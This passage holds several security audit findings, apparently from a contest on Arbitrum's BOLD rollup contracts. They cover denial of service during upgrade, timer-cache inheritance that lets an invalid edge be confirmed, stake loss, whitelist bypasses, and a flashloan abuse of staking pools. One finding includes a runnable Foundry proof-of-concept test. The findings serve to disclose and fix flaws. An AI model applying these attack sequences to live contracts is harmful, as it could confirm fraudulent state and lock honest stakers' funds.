During the upgrade process, it pauses the old Nitro rollup contract and force-refund all stakes in the contract before the upgrade.

function cleanupOldRollup() private {
    IOldRollupAdmin(address(OLD_ROLLUP)).pause();
    // ...
    for (uint64 i = 0; i < stakerCount; i++) {
        // ...
        IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
        // ...
    }
    // ...
}

The pause called during the upgrade, which means validators can still create an assertion on the old Nitro contract.
If any validator creates an assertion before the upgrade happens, the forceRefundStaker will revert which will prevent the upgrade as the code snippet below shows(Nitro's RollupAdminLogic.sol:L276).

function forceRefundStaker(address[] calldata staker) external override whenPaused {
    require(staker.length > 0, "EMPTY_ARRAY");
    for (uint256 i = 0; i < staker.length; i++) {
        require(_stakerMap[staker[i]].currentChallenge == NO_CHAL_INDEX, "STAKER_IN_CHALL");
        reduceStakeTo(staker[i], 0);
        turnIntoZombie(staker[i]);
    }
    emit OwnerFunctionCalled(22);
}

This reverts because the staker's current challenge exists.

Tools Used

Manual Review

Recommended Mitigation Steps

Rather than pausing and force-refunding all stakes in the Nitro contract, it should upgrade the old Nitro rollup contract to a patch contract that allows existing stakers to withdraw their stakes by themselves.

Assessed type

DoS

A flaw in the time confirmation mechanism enables the confirmation of erroneous edges.

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L520-L531
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L689-L710

Vulnerability details

Impact

An attacker can exploit a vulnerability in the confirmation by time algorithm to confirm incorrect edges, leading to the confirmation of erroneous assertions.

Proof of Concept

There are two methods available for confirming an edge. Stakers can either bisect the edge until a one-step proof can be obtained and executed, or they can wait until the time threshold has been reached and confirm an unrivaled edge.

The confirmation by time algorithm involves two methods: updateTimerCacheByChildren and updateTimerCacheByClaim. These methods are responsible for updating the unrivaled time cache of edges in a chain.

    /// @inheritdoc IEdgeChallengeManager
    function multiUpdateTimeCacheByChildren(bytes32[] calldata edgeIds) public {
        for (uint256 i = 0; i < edgeIds.length; i++) {
            (bool updated, uint256 newValue) = store.updateTimerCacheByChildren(edgeIds[i]);
            if (updated) emit TimerCacheUpdated(edgeIds[i], newValue);
        }
    }

    /// @inheritdoc IEdgeChallengeManager
    function updateTimerCacheByChildren(bytes32 edgeId) public {
        (bool updated, uint256 newValue) = store.updateTimerCacheByChildren(edgeId);
        if (updated) emit TimerCacheUpdated(edgeId, newValue);
    }

If the assertion has edges in multiple levels each of them must update their unrivaled time cache via updateTimerCacheByClaim.

    /// @inheritdoc IEdgeChallengeManager
    function updateTimerCacheByClaim(bytes32 edgeId, bytes32 claimingEdgeId) public {
        (bool updated, uint256 newValue) = store.updateTimerCacheByClaim(edgeId, claimingEdgeId, NUM_BIGSTEP_LEVEL);
        if (updated) emit TimerCacheUpdated(edgeId, newValue);
    }

The algorithm relies on accumulating enough unrivaled time to pass the confirmation threshold.

    function confirmEdgeByTime(
        EdgeStore storage store,
        bytes32 edgeId,
        uint64 claimedAssertionUnrivaledBlocks,
        uint64 confirmationThresholdBlock
    ) internal returns (uint256) {
        if (!store.edges[edgeId].exists()) {
            revert EdgeNotExists(edgeId);
        }

        uint256 totalTimeUnrivaled = timeUnrivaledTotal(store, edgeId);
        totalTimeUnrivaled += claimedAssertionUnrivaledBlocks;

>>      if (totalTimeUnrivaled < confirmationThresholdBlock) {
            revert InsufficientConfirmationBlocks(totalTimeUnrivaled, confirmationThresholdBlock);
        }

        // we also check the edge is pending in setConfirmed()
        store.edges[edgeId].setConfirmed();

        // also checks that no other rival has been confirmed
        setConfirmedRival(store, edgeId);

        return totalTimeUnrivaled;
    }

The issue arises in the updateTimerCacheByClaim method, where a "bad" edge can inherit unrivaled time from a "good" edge. This occurs when the function adds the cached time of a lower level edge to the total unrivaled time of the current edge.

    function updateTimerCacheByClaim(
        EdgeStore storage store,
        bytes32 edgeId,
        bytes32 claimingEdgeId,
        uint8 numBigStepLevel
    ) internal returns (bool, uint256) {
        // calculate the time unrivaled without inheritance
        uint256 totalTimeUnrivaled = timeUnrivaled(store, edgeId);
>>      checkClaimIdLink(store, edgeId, claimingEdgeId, numBigStepLevel);
        totalTimeUnrivaled += store.edges[claimingEdgeId].totalTimeUnrivaledCache;
        return updateTimerCache(store, edgeId, totalTimeUnrivaled);
    }

Let's take a closer look at checkClaimIdLink:

    function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
        private
        view
    {
        // we do some extra checks that edge being claimed is eligible to be claimed by the claiming edge
        // these shouldn't be necessary since it should be impossible to add layer zero edges that do not
        // satisfy the checks below, but we conduct these checks anyway for double safety

        // the origin id of an edge should be the mutual id of the edge in the level below
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
        }
        // the claiming edge must be exactly one level below
        if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

The validation process ensures that the claimingEdge is one layer below edgeId and its originId is equal to edgeId.mutualId(). However, in the case of rival edges, all of them share the same originId, which is equal to the mutualId of the higher-level edge. This allows us to exploit the validation by passing a "bad" edgeId, which will eventually pass the validation and enable us to inherit cached time from the "good" edge.

To exploit this vulnerability, an attacker can create a "bad" assertion and initiate a dispute between two edges, where one edge is "good" and the other is "bad". After some bisecting and the creation of edges at the new levels, the attacker stops responding, leading honest validators to believe that they can win the dispute by waiting for the confirmation threshold to pass.

Once the confirmation threshold has passed, the attacker, front-running the honest validator, executes a chain of time cache updates starting from the "good" edge. By accumulating time from the "good" edge, the attacker can confirm their "bad" edge and validate the erroneous assertion.

Coded POC for EdgeChallengeManager.t.sol

    function testCanConfirmByClaimSubChallenge() public {
        EdgeInitData memory ei = deployAndInit();
        (
            bytes32[] memory blockStates1,
            bytes32[] memory blockStates2,
            BisectionChildren[6] memory blockEdges1,
            BisectionChildren[6] memory blockEdges2
        ) = createBlockEdgesAndBisectToFork(
            CreateBlockEdgesBisectArgs(
                ei.challengeManager,
                ei.a1,
                ei.a2,
                ei.a1State,
                ei.a2State,
                false,
                a1RandomStates,
                a1RandomStatesExp,
                a2RandomStates,
                a2RandomStatesExp
            )
        );

        BisectionData memory bsbd = createMachineEdgesAndBisectToFork(
            CreateMachineEdgesBisectArgs(
                ei.challengeManager,
                1,
                blockEdges1[0].lowerChildId,
                blockEdges2[0].lowerChildId,
                blockStates1[1],
                blockStates2[1],
                false,
                ArrayUtilsLib.slice(blockStates1, 0, 2),
                ArrayUtilsLib.slice(blockStates2, 0, 2)
            )
        );

        BisectionData memory ssbd = createMachineEdgesAndBisectToFork(
            CreateMachineEdgesBisectArgs(
                ei.challengeManager,
                2,
                bsbd.edges1[0].lowerChildId,
                bsbd.edges2[0].lowerChildId,
                bsbd.states1[1],
                bsbd.states2[1],
                true,
                ArrayUtilsLib.slice(bsbd.states1, 0, 2),
                ArrayUtilsLib.slice(bsbd.states2, 0, 2)
            )
        );

        _safeVmRoll(block.number + challengePeriodBlock);

        BisectionChildren[] memory allWinners =
            concat(concat(toDynamic(ssbd.edges1), toDynamic(bsbd.edges1)), toDynamic(blockEdges1));
        // Bad edges
        BisectionChildren[] memory allLoosers =
            concat(concat(toDynamic(ssbd.edges2), toDynamic(bsbd.edges2)), toDynamic(blockEdges2));

        // Bad validator accumulates time for good edges
        ei.challengeManager.updateTimerCacheByChildren(allWinners[0].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[0].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[1].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[1].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[2].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[2].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[3].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[3].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[4].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[4].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[5].lowerChildId);

        // But when moving to another level he claims the timer cache for the bad edge
        ei.challengeManager.updateTimerCacheByClaim(allLoosers[6].lowerChildId, allWinners[5].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[6].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[7].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[7].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[8].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[8].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[9].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[9].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[10].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[10].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[11].lowerChildId);

        ei.challengeManager.updateTimerCacheByClaim(allLoosers[12].lowerChildId, allLoosers[11].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[12].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[13].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[13].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[14].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[14].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[15].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[15].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[16].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[16].upperChildId);

        // Bad edge won the dispute by time
        ei.challengeManager.confirmEdgeByTime(allLoosers[17].lowerChildId, ei.a1Data);

        assertTrue(
            ei.challengeManager.getEdge(allLoosers[17].lowerChildId).status == EdgeStatus.Confirmed, "Edge confirmed"
        );
    }

Tools Used

Foundry

Recommended Mitigation Steps

One of the steps to prevent this vulnerability would be to validate the claimId in the checkClaimIdLink function.

    function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
        private
        view
    {
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
        }
        // the claiming edge must be exactly one level below
        if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
+       // the claiming edge claimId must be the edgeId
+       if (store.edges[claimingEdgeId].claimId != edgeId) {
+           revert ClaimIdInvalid()
+       }
    }

Assessed type

Invalid Validation

An invalid assertion can get confirmed, even when there are honest participants

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L826-L830
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L529

Vulnerability details

Impact

Even though an assertion is invalid, adversary can make it get confirmed just because some states within it were valid.
Note that even though an honest party later proves the state that was invalid, it would be irrelevant cos the adversay block edge level has been confirmed, and timer set to max uint64.

Proof of Concept

Normally, if there are two rival assertions, it is expected that the honest participant would bisect his edge to the exact point where he disagrees with the adversary, and then oneStepProve that executing a step on the prevState(which everyone agrees on), would yield the state that he claimed.

Once honest participant does that, he can then:

  • confirmEdgeByOneStepProof, which would update the timerCache of that proven singleStepEdge to uint64.max
  • updateTimerCacheByClaim, which allows him to recursively update timerCache of parent levels(till he reaches block level) to timerCache of the singleStepEdge(i.e. uint64.max)
function updateTimerCacheByClaim(
    EdgeStore storage store,
    bytes32 edgeId,
    bytes32 claimingEdgeId,
    uint8 numBigStepLevel
) internal returns (bool, uint256) {
    // calculate the time unrivaled without inheritance
    uint256 totalTimeUnrivaled = timeUnrivaled(store, edgeId);
    checkClaimIdLink(store, edgeId, claimingEdgeId, numBigStepLevel);
@>  totalTimeUnrivaled += store.edges[claimingEdgeId].totalTimeUnrivaledCache;
    return updateTimerCache(store, edgeId, totalTimeUnrivaled);
}
  • confirmEdgeByTime for the block level edge, which checks that the edge's timerCache(in this case, uint64.max) is greater than confirmationThresholdBlocks.
  • Now, the block level edge is confirmed, so he can confirmAssertion in the assertion chain after the confirmPeriodBlocks.

But the issue is, Adversary can create an invalid assertion and bisect it to a point where it was valid, and perform the steps outlined above.

For example,

  • Honest party assertion claim state = ABCDEFGH
  • Adversary claim state=ABCDEFGZ
  • Adversary bisects his edge to the point where he is able to prove that SmallStepEdge B transitions to C
  • Adversary calls confirmEdgeByOneStepProof to confirm his SmallStepEdge
  • Adversary updateTimeerCacheByClaim till he reaches his Block Edge
  • Adversary confirmEdgeByTime of his block edge, and would be able to confirmAssertion in the assertionChain after confirmPeriodBlocks

Tools Used

Manual Review

Recommended Mitigation Steps

onestepProving an edge should not immediately allow the parent block edge to be confirmable, as the bigger picture may be invalid.
Only those that were able to oneStepProve all the singleStepEdges as requested by other rivals after the confirmationThresholdBlocks should be allowed to updateTimerCacheByClaim, and confirmEdgeByTime.

Assessed type

Context

Staked amounts on layer zero edges could be stuck or even lost for honest challengers

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/EdgeChallengeManager.sol#L580-L582

Vulnerability details

Impact

Honest parties who created edge challanges can not get a refund if the the stake token or amount zero'd out. As a result, the funds are stuck or even lost even if the stake token or amount are set back again by deploying a new challange manager. (check PoC below for how this can be done by a malicious party).

Proof of Concept

When a zero layer edge is created it must include stake amount.

	st.safeTransferFrom(msg.sender, receiver, sa);

EdgeChallengeManager.sol:L434

The amounts are stored in stakeAmounts[] which are set upon challenge manager deployment. Note that, staking can be disabled by setting zeros for the token or stakeAmounts. To do this, a new challenge manager needs to be deployed and its address updated in the assertion chain.

However, when this is done (e.g. stakeAmounts are zeroed), all honest participants won't be able to refund their stake. This is because of this check:

	if (address(st) != address(0) && sa != 0) {
		st.safeTransfer(edge.staker, sa);
	}

EdgeChallengeManager.sol:L580-L582

As a result, any unclaimed stakes by honest participants will be lost.

Furthermore, to create an attack from this, a malicious party can wait till the token or stakeAmounts are zero, and call refundStake for all honest participants (with confirmed edges). This is possible since anyone can call refundStake for any edge. Thus, resulting in setting their edges as refunded although they didn't receive any amounts.

 edge.setRefunded();

EdgeChallengeManager.sol:L575-L576

Tools Used

Manual analysis

Recommended Mitigation Steps

refundStake shouldn't be permission-less, only the staker should be allowed to call it.

Assessed type

Other

Old rollup whose count > 50 may lose their stake when upgrading to new rollup

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/265c57800145734362a4bb1b46465ff35b47beac/src/rollup/BOLDUpgradeAction.sol#L341

Vulnerability details

Impact

Some stakers in old roll up will lose their stake when upgrading to new rollup.

Proof of Concept

when bold update , in function perform, we will call cleanupOldRollup to clean up old rollup.
The stake count is set to max value 50, it's a magic number, if the staker count is greater than 50, the staker will lose their stake when upgrading to new rollup.
In roll up logic, we don't have any check to make sure that staker amount is less than 50, so it's possible to lose stake when upgrading to new rollup.

   function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
 @>       if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
    }

Tools Used

manual

Recommended Mitigation Steps

add check to make sure that staker amount is less than 50 when upgrading to new rollup or remove the magic number 50 .

Assessed type

Invalid Validation

Undesirable behaviour in the event of a fork immediately after BOLD upgrade

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L62

Vulnerability details

In Contract RollupUserLogic, in the function removeWhitelistAfterValidatorAfk() there is a check for Number of blocks since the last confirmed assertion before the validator whitelist is removed, which is configured as 28 days. The validatorWhitelistDisabled can be set to True only after this period of 28 days has passed (after which the validators are considered afk).

However the same check is missing in the removeWhitelistAfterFork(). Here the only check is if the chainid is different than the deployTimeChainId.
If there is a fork just after the BOLD upgrade and before the 28 days, then anyone can trigger this function to set the validatorWhitelistDisabled to True and opening up the protocol to permissionless Validators.

This is not desirable and will have undesired behaviour to the protocol Assertion/Validation logic.

Proof of Concept

Contract : RollupUserLogic.sol
Function : removeWhitelistAfterFork()

Recommended Mitigation Steps

Add similar check to the function removeWhitelistAfterFork().

    function removeWhitelistAfterFork() external {
        require(!validatorWhitelistDisabled, "WHITELIST_DISABLED");
        require(_chainIdChanged(), "CHAIN_ID_NOT_CHANGED");
++      require(_validatorIsAfk(), "VALIDATOR_NOT_AFK");
        validatorWhitelistDisabled = true;
    }

Assessed type

Invalid Validation

Creating invalid assertion using honest parties' staked funds

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L40

Vulnerability details

Impact

An attacker can create invalid assertion without risking his own funds, instead locking the honest parties' staked funds.

Proof of Concept

Attack explanation in general

  1. A valid assertion is already confirmed, called A. So we have the following assertion tree:
 A ---------------------> 
 valid                                 
 confirmed                           
 assertion              
  1. An AssertionStakingPool contract is already created with immutable assertionHash equal to zero. When the staked amount in this contract reaches to the requiredStake amount, it creates a valid assertion. I am assuming all the participants in this staking pool are honest. So we have:
A ---------------------> B ----------------->
valid                  valid               
confirmed              pending             
assertion              assertion
                       staker:
                       AssertionStakingPool
  1. After some time (note that the assertion B is not confirmed yet), the attacker gets a flashloan and creates an invalid assertion, called C as a child of assertion B. So, we will have the following assertion tree.
A ---------------------> B -------------------------> C ------------------------->
valid                  valid                       invalid                     
confirmed              pending                     pending                     
assertion              assertion                   assertion                   
                       staker:                     staker:                     
                       AssertionStakingPool        Attacker                           
  1. Since the assertion B now has a child, its staker (which is the staking pool) is considered as an inactive staker. So, the attacker, in the same transaction, calls the function makeStakeWithdrawableAndWithdrawBackIntoPool in AssertionStakingPool contract. By doing so all the staked amount will return to the pool again.
  2. In the same transaction, the attacker, by using the available amount in AssertionStakingPool contract, creates another invalid assertion, called D, as a child of assertion C. In other words, the attacker calls createAssertion in the AssertionStakingPool contract to create a new invalid assertion. So we will have:
A ---------------------> B -------------------------> C -------------------------> D ----------------->
valid                  valid                       invalid                     invalid
confirmed              pending                     pending                     pending
assertion              assertion                   assertion                   assertion
                       staker:                     staker:                     staker:
                       AssertionStakingPool        Attacker                    AssertionStakingPool
  1. Since assertion C has a child now, the attacker (who is the staker of assertion C) can withdraw his deposited amount, and repays the flashloan.

Notes:

  • The attacker could create two invalid assertions, without risking his own funds.
  • The attacker wasted the fund staked in the contract AssertionStakingPool, because the assertions C and D will be challenged by honest parties and will be rejected in the end. Therefore, the staked amount related to assertion D will be locked. This locked staked amount was owned by honest stakers in the AssertionStakingPool. In other words, honest parties who staked to create the valid assertion B are now fined because of creating invalid assertion D.

Attack explanation in details

  • In step 2, it is assumed that the deployed AssertionStakingPool contract has zero immutable assertionHash.
  bytes32 public immutable assertionHash;
  constructor(
      address _rollup,
      bytes32 _assertionHash
  ) AbsBoldStakingPool(IRollupCore(_rollup).stakeToken()) {
      rollup = _rollup;
      assertionHash = _assertionHash;
  }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L36

Having this immutable equal to zero allows any user to call createAssertion, when the total staked amount reaches to threshold requiredStake, with arbitrary data assertionInput as the input parameter. In this scenario, I was assuming the honest parties provided valid input to create the valid assertion B. But, later, the attacker misuses this opportunity and provides malicious input to create invalid assertion D.

  function createAssertion(AssertionInputs calldata assertionInputs) external {
      uint256 requiredStake = assertionInputs.beforeStateData.configData.requiredStake;
      // approve spending from rollup for newStakeOnNewAssertion call
      IERC20(stakeToken).safeIncreaseAllowance(rollup, requiredStake);
      // reverts if pool doesn't have enough stake and if assertion has already been asserted
      IRollupUser(rollup).newStakeOnNewAssertion(requiredStake, assertionInputs, assertionHash, address(this));
  }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L40

Because, when immutable assertionHash is zero, the parameter expectedAssertionHash in the subsequent functions will be zero. So, it will bypass the check between the expected assertion hash and the newly created assertion hash.

  function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
      public
      onlyValidator
      whenNotPaused
  {
      //.....
      require(
          expectedAssertionHash == bytes32(0)
              || getAssertionStorage(expectedAssertionHash).status == AssertionStatus.NoAssertion,
          "EXPECTED_ASSERTION_SEEN"
      );
      //.....
      (bytes32 newAssertionHash, bool overflowAssertion) =
          createNewAssertion(assertion, prevAssertion, expectedAssertionHash);
      //.....
  }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L163

    function createNewAssertion(
        AssertionInputs calldata assertion,
        bytes32 prevAssertionHash,
        bytes32 expectedAssertionHash
    ) internal returns (bytes32 newAssertionHash, bool overflowAssertion) {
        //.....
        require(
            newAssertionHash == expectedAssertionHash || expectedAssertionHash == bytes32(0),
            "UNEXPECTED_ASSERTION_HASH"
        );
        //.....
    }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L478

  • In step 4, the attacker calls the function makeStakeWithdrawableAndWithdrawBackIntoPool to return the staked amount to the AssertionStakingPool contract.
    function makeStakeWithdrawableAndWithdrawBackIntoPool() external {
        makeStakeWithdrawable();
        withdrawStakeBackIntoPool();
    }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L60

This is possible, because the assertion B now has a child, so the withdrawal is possible as AssertionStakingPool contract address is considered as an inactive staker.

    function returnOldDeposit() external override onlyValidator whenNotPaused {
        requireInactiveStaker(msg.sender);
        withdrawStaker(msg.sender);
    }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L222

    function requireInactiveStaker(address stakerAddress) internal view {
        require(isStaked(stakerAddress), "NOT_STAKED");
        // A staker is inactive if
        // a) their last staked assertion is the latest confirmed assertion
        // b) their last staked assertion have a child
        bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
        bool isLatestConfirmed = lastestAssertion == latestConfirmed();
        bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0;
        require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
    }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L565

  • In step 5, the attacker, in the same transaction, calls the function createAssertion in the AssertionStakingPool contract to create the invalid assertion D on behalf of the AssertionStakingPool contract. Note that, the required stake is available in this contract, because in step 4, the staked amount related to the assertion B are returned.

  • A question may arise that there should be minimumAssertionPeriod delay between assertions creation. So, the attacker can not create the assertion D immediately after the assertion C. But this is not the correct statement. Because the attacker creates assertion D, so that the overflowAssertion is true.

       if (!overflowAssertion) {
           uint256 timeSincePrev = block.number - getAssertionStorage(prevAssertion).createdAtBlock;
           // Verify that assertion meets the minimum Delta time requirement
           require(timeSincePrev >= minimumAssertionPeriod, "TIME_DELTA");
       }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L204-L208

In other words, suppose when the assertion B is created, nextInboxPosition is set to 100. When the invalid assertion C is going to be created, for example, 10 more messages are added to the inbox. So, assertion C is created with after state inboxPosition = 100 and nextInboxPosition = 110. In the same transaction, assertion D is going to be created. This time, the attacker sets after state inboxPosition to 105 (which is smaller than the target nextInboxPisition = 110). By doing so, the overflowAssertion will become true, as a result, it allows to create assertions without any delay.

           if (assertion.afterState.machineStatus != MachineStatus.ERRORED && afterStateCmpMaxInbox < 0) {
               // If we didn't reach the target next inbox position, this is an overflow assertion.
               overflowAssertion = true;
               // This shouldn't be necessary, but might as well constrain the assertion to be non-empty
               require(afterGS.comparePositions(beforeGS) > 0, "OVERFLOW_STANDSTILL");
           }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L429-L434

Tools Used

Recommended Mitigation Steps

  • Preventing from creating another assertion in AssertionStakingPool contract.
   function createAssertion(AssertionInputs calldata assertionInputs) external {
       require(!alreadyCreated, "An assertion has already been created.");
       //......
       alreadyCreated = true;
   }
  • Putting an access control on the function createAssertion in the contract AssertionStakingPool, when the immutable assertionHash is zero. This might lead to centralization.

Assessed type

Context

confirmation timelock grace period is bypassed when the contract is paused and then unpaused

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L125

Vulnerability details

Impact

confirmation timelock is bypassed when the contract is paused and then unpaused

Proof of Concept

After a new assertion is created, there is a timelock period

// Check that deadline has passed
require(block.number >= assertion.createdAtBlock + prevConfig.confirmPeriodBlocks, "BEFORE_DEADLINE");

the prevConfig.confirmPeriodBlocks is the timelock window that act as buffer so the assertion cannot be confirmed immeidately.

However, when the contract the paused, the new block still get mined and increment the block.number

when the contract is unpaused, the assertion can be immediately confirmed but trhe timelock period prevConfig.confirmPeriodBlocks is not honored.

the challange grace period will be bypassed as well in the cause when contract is paused, leaving no time to challange a invalid assertion.

if (prevAssertion.secondChildBlock > 0) {
        // if the prev has more than 1 child, check if this assertion is the challenge winner
        ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
        require(winningEdge.claimId == assertionHash, "NOT_WINNER");
        require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
        require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
        // an additional number of blocks is added to ensure that the result of the challenge is widely
        // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
        // always be challengeGracePeriodBlocks before an assertion can be confirmed
        require(
            block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
            "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
        );
    }

Tools Used

Manual Review

Recommended Mitigation Steps

consider extend grace period for resolve assertion and edge if the contract is unpaused after paused.

Assessed type

Token-Transfer

`removeWhitelistAfterFork` and `removeWhitelistAfterValidatorAfk` can be called when contract is paused, disabling whitelist mechanism

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupAdminLogic.sol#L143-L161
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L62-L75

Vulnerability details

Description

If validator whitelist is not meant to be diasable, and rollup contract is pause for enough time, the whitelist can be removed by calling removeWhitelistAfterFork and removeWhitelistAfterValidatorAfk immediatelly after admin unpause rollup contract

Impact

If:

  • Rollup contract is paused
  • Validator whitelist mechanis is enable and is not meant to be disabled
  • There is no intention of Rollup admin to force the inclusion of a new assertion

Then, immediately after admin call RollupAdminLogic.unpause(), anyone can call removeWhitelistAfterFork and removeWhitelistAfterValidatorAfk, enforcing whitelist mechanism to disable and enabling anyone to submit new assertions.

Recommended mitgation

To solve this:

  • Add a check in removeWhitelistAfterFork and removeWhitelistAfterValidatorAfk to ensure that rollup contract is not paused
  • Add a grace period to check if rollup when removeWhitelistAfterFork or removeWhitelistAfterValidatorAfk are called to allow validators to confirm assertions.

In this way:

abstract contract RollupCore is IRollupCore, PausableUpgradeable {
    // After already decleared variable
    //...
    uint256 public unpauseTimestampGracePeriod
    //...
}
    contract RollupAdminLogic is RollupCore, IRollupAdmin, DoubleLogicUUPSUpgradeable {
    //...
-      function resume() external override {
+      function resume(uint256 _unpauseTimestampGracePeriod) external override {
+          require(_unpauseTimestampGracePeriod >= block.timestamp);
+          unpauseTimestampGracePeriod = _unpauseTimestampGracePeriod;
            _unpause();
            emit OwnerFunctionCalled(4);
        }
    }
    // ...
}
    contract RollupUserLogic is RollupCore, UUPSNotUpgradeable, IRollupUser {
    //...

+   function _requirePauseChecks(){
+       require(!paused(), "CONTRACT_PAUSED");
+       require(block.timestamp > unpauseTimestampGracePeriod, "UNPAUSE_GRACE_PERIOD");
+   }

    function removeWhitelistAfterFork() external {
+       // unpause checks
+       _requirePauseChecks();
